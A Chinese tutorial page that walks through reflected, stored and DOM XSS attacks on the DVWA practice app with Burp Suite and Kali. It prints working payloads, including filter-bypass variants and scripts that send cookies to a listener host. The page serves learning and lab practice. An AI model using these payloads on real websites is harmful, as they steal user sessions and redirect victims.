Docker 分布式机器 物联网项目 反射 reactjs selenium dom junit null mysql默认密码 多线程实现方式 mysql分页查询sql语句 pcie高速固态硬盘 pythonfor循环 python分析 python免费教程 java使用 java的框架 java如何编写接口 ip隐藏 subprocess 德鲁伊武器 隐藏虚拟键 millenium 复制到剪贴板 页面刷新 迅雷会员共享账号 ps从入门到精通 bootskin 苹果电脑数据恢复 qt5下载 js组合 exe文件反编译 大数据就业方向 origin柱状图 画吧教程 俄罗斯方块java 如何加入工作组 mysql下载64位 方正小标宋gbk
当前位置: 首页 > 学习教程  > 编程学习

跨站脚本攻击XSS演示(burpsuite)

2021/1/9 2:02:51 文章标签: 跨站攻击

XSS简介 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代…

XSS简介

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的
通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击,事件被触发的时候嵌入的JavaScript代码将会被执行
1。注入客户端脚本代码
2。盗取cookie
3。重定向

分为3类
1.反射型XSS
2.存储型XSS
3.DOM XSS

实验语句

这次实验是在DVWA上做的
下面的语句都能用于每一种XSS

**直接嵌入**
<script>alert('xss')</script>

**元素事件**
 <body onload=alert('xss')>
 <a href=http://192.168.10.128>clik</a>
 <img src=http://192.168.10.128/a.jpg onerror=alert('xss2')>
 <a href=''onclick=alert('xss4')>type</a> 

****重定向****
<script> window.location="http://www.baidu.com"</script>
<script> window.location="http://192.168.10.128"</script>
<iframe src='http://192.168.10.129/a.jpg' height='0' width='0'><iframe>

**获取cookie**
<script>new lmage().src="http://192.168.10.129/c.php?output="+document.cookie;</script>
<script src='http://192.168.10.129/a.js'></script>

反射型XSS

又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。

获取cookie流程
1.黑客向服务器发送一个cookie,服务器返回一个带有脚本的JS页面
2.用户向黑客发送cookie值,黑客向用户发送带有脚本的url

在这里插入图片描述
重定向
1和上面一样,然后重定向直接转向第三方网站

在这里插入图片描述

1.初级low
源代码
在这里插入图片描述
输入1后显示hello 1
在这里插入图片描述

直接嵌入

<script>alert('xss')</script>

在这里插入图片描述
打开burpsuite抓包
这里为发出的包,框内为我们填在框里的数据
在这里插入图片描述
这里是回包,数据和发送包一样,说明存在XSS
在这里插入图片描述

元素事件

<body onload=alert('xss')>

在这里插入图片描述

<a href=http://192.168.10.128>clik</a>

在这里插入图片描述
点击clik进入目标
在这里插入图片描述

<img src=http://192.168.10.128/a.jpg onerror=alert('xss2')>

在这里插入图片描述
在这里插入图片描述

<a href=''onclick=alert('xss4')>type</a>

在这里插入图片描述
点击type后弹出页面

在这里插入图片描述
抓包
发送包在这里插入图片描述
回包在这里插入图片描述

重定向
重定向(Redirect)就是通过各种方法将各种网络请求重新定个方向转到其它位置(如:网页重定向、域名的重定向、路由选择的变化也是对数据报文经由路径的一种重定向)。

<script> window.location="http://www.baidu.com"</script>

输入后直接跳转至目标网址
在这里插入图片描述

<script> window.location="http://192.168.10.128"</script>

在这里插入图片描述
点击type
在这里插入图片描述

<iframe src='http://192.168.10.129/a.jpg' height='0' width='0'><iframe>

在这里插入图片描述
使用Kali监听80端口

nc -vnlp80

抓到数据
在这里插入图片描述

获取cookie

Cookie 用于存储 web 页面的用户信息。

什么是 Cookie?

Cookie 是一些数据, 存储于你电脑上的文本文件中。
当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。
Cookie 的作用就是用于解决 “如何记录客户端的用户信息”:
• 当用户访问 web 页面时,他的名字可以记录在 cookie 中。
• 在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录

随意抓取一个包
可以修改cookie把low修改为high
在这里插入图片描述
修改为high然后forward放过
在这里插入图片描述
回到界面发现变成了high
在这里插入图片描述
说明了cookie数据的重要性

<script>new lmage().src="http://192.168.10.129/c.php?output="+document.cookie;</script>


<script src='http://192.168.10.129/a.js'></script>

在这里插入图片描述
kali监听

在这里插入图片描述

中级Medium

源代码
在这里插入图片描述
源代码中要过滤

1.将script中字幕改变大小写用来避免过滤

<Script>alert('xss')</script>>

在这里插入图片描述

2.将script改为script<script>

<script<script>>alert('xss')</script>>

在这里插入图片描述

3.将script改为script script
<script script>alert('xss')</script>>

4.将script改为script ,后面加个空格
<script >alert('xss')</script>>

以上所有方式代码和初级一样只需把script转换一下就行
在这里插入图片描述

存储型XSS

又称为持久型跨站点脚本,它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库,当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。持久的XSS相比非持久性XSS攻击危害性更大,因为每当用户打开页面,查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS。

获取cookie

1.黑客向服务器发送cookie 带脚本的JS语句,服务器返回一个JS页面
2.用户访问服务器的时候服务器将带有脚本的JS页面发给用户,然后用户将数据cookie给了黑客

在这里插入图片描述
重定向
前面都一样,然后都跳转至第三方网站

在这里插入图片描述

初级low
源代码
在这里插入图片描述
代码输入在name或者message都可以
在name框内有字数限制,怎么破除这个字数限制呢
在页面按F12跳出这个界面,点击左下角这个按钮

在这里插入图片描述
将鼠标拖至name中,然后将数据最大字数maxlength数据改大即可,同样message也可以这样修改,不过页面刷新后又恢复重置
在这里插入图片描述

<script>alert('xss')</script>

代码输入在name或者message都可以
Message中随意填写
在这里插入图片描述
存储型XSS每次进入该界面都会跳出该窗口

抓包
看到了我们输入的数据和cookie
在这里插入图片描述

想要取消每次的跳出去如图页面点击重置即可
在这里插入图片描述

<script>alert('xss')</script> name中随意填写
在这里插入图片描述
在这里插入图片描述

<a href=http://192.168.10.129>clik</a>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

<img src=http://192.168.10.128/a.jpg onerror=alert

在这里插入图片描述
在这里插入图片描述

重定向

<script> window.location="http://www.baidu.com"</script>

在这里插入图片描述
在这里插入图片描述

<script> window.location="http://192.168.10.128"</script>

在这里插入图片描述

在这里插入图片描述

<iframe src='http://192.168.10.129/a.jpg' height='0' width='0'><iframe>

在这里插入图片描述
kali监听
在这里插入图片描述
下面跳出登录名和结果
在这里插入图片描述
获取cookie

<script>new lmage().src="http://192.168.10.129/c.php?output="+document.cookie;</script>

在这里插入图片描述
kali监听
在这里插入图片描述
抓包

在这里插入图片描述

<script src='http://192.168.10.129/a.js'></script>

在这里插入图片描述
kali监听
在这里插入图片描述

DOM XSS

基于DOM的XSS有时也称为type0XSS。当用户能够通过交互修改浏览器页面中的DOM(DocumentObjectModel)并显示在浏览器上时,就有可能产生这种漏洞,从效果上来说它也是反射型XSS。

源代码
在这里插入图片描述
选择English
在这里插入图片描述
发现url出最后多了english
在这里插入图片描述
在English最后添加语句
在这里插入图片描述

在这里插入图片描述

<script> window.location="http://www.baidu.com"</script>

在这里插入图片描述
短暂延迟后跳转至百度
在这里插入图片描述

<script> window.location="http://192.168.10.128"</script>

在这里插入图片描述

在这里插入图片描述


本文链接: http://www.dtmao.cc/news_show_1100251.shtml

附件下载

相关教程

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?